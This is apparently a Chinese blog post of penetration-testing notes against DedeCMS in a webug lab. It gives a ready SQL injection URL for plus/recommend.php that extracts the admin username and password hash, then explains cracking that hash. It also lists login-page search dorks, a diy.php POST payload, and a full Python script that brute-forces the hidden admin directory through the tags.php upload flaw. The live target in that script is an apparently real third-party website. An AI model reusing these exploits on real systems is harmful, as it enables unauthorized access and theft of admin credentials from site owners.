webug-dedecms测试

  • by

正文:

1.dedecms v57最新注入+getshell漏洞(plus/download.php)

http://www.hackdig.com/?06/hack-4026.htm
https://www.seebug.org/vuldb/ssvid-60834

2.DedeCMS全版本通杀SQL注入漏洞利用

http://www.weixianmanbu.com/article/157.html

3.DedeCMSrecommend.php文件通杀SQL注入漏洞

https://blog.csdn.net/change518/article/details/20564207
poc:
plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294
得到:
文档的名称是:|admin|747a6afbbcbf8be7668a
网址是:http://localhost9=3
这是dedecms的密文,20位。dedecms后台管理密码的md5加密算法是从32位md5中截取的20位,所以去掉前3位和最后1位,即可获得16位md5值
a6afbbcbf8be7668  解出来
test123

二.找后台

1.google hack

site:inurl:login.php
site:http://192.168.244.137/pentest/cms/dedecms1/ inurl:login.php
本地的没有收录进去

2.dedecms后台

https://xz.aliyun.com/t/2064
https://www.cnblogs.com/zhaijiahui/p/8484667.html 能用的
注意两点:
1.如果根目录下不存在tags.php,POC的POST内同应该这样写

    http://localhost/dedecms/plus/diy.php
    POST
    dopost=save&_FILES[b4dboy][tmp_name]=./../de</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif

2.
会有个http最大连接数出错,可能是本机的问题,更新requests库
pip install –upgrade requests
可能是网址有防护,time.sleep(2)
养成个好习惯,延时,别成dos攻击了
还可能是这种情况:
s = requests.session()
requests.adapters.DEFAULT_RETRIES = 10
s.keep_alive = False

#!/usr/bin/env python
#coding=utf-8
'''/*
    * author = Mochazz
    * team   = 红日安全团队
    * env    = pyton3
    *
    */
'''
import requests
import itertools
import string,time
s = requests.session()
requests.adapters.DEFAULT_RETRIES = 10
s.keep_alive = False
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
back_dir = ""
flag = 0
# url = "http://192.168.1.9/tags.php"
url = "http://www.300480.cn/tags.php"
data = {
    "_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif",
    "_FILES[mochazz][name]" : 0,
    "_FILES[mochazz][size]" : 0,
    "_FILES[mochazz][type]" : "image/gif"
}
for num in range(1,7):
    time.sleep(2)
    if flag:
        break
    for pre in itertools.permutations(characters,num):
        time.sleep(2)
        pre = ''.join(list(pre))
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)
        print("testing",pre)
        r = s.post(url,data=data)
        if "Upload filetype not allow !" not in r.text and r.status_code == 200:
            flag = 1
            back_dir = pre
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
print("[+] 前缀为:",back_dir)
flag = 0
for i in range(30):
    time.sleep(2)
    if flag:
        break
    for ch in characters:
        time.sleep(2)
        if ch == characters[-1]:
            flag = 1
            break
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch)
        r = s.post(url, data=data)
        if "Upload filetype not allow !" not in r.text and r.status_code == 200:
            back_dir += ch
            print("[+] ",back_dir)
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
print("后台地址为:",back_dir)

找到后台dede
登陆进去
 
2018.7.9

发表评论

电子邮件地址不会被公开。 必填项已用*标注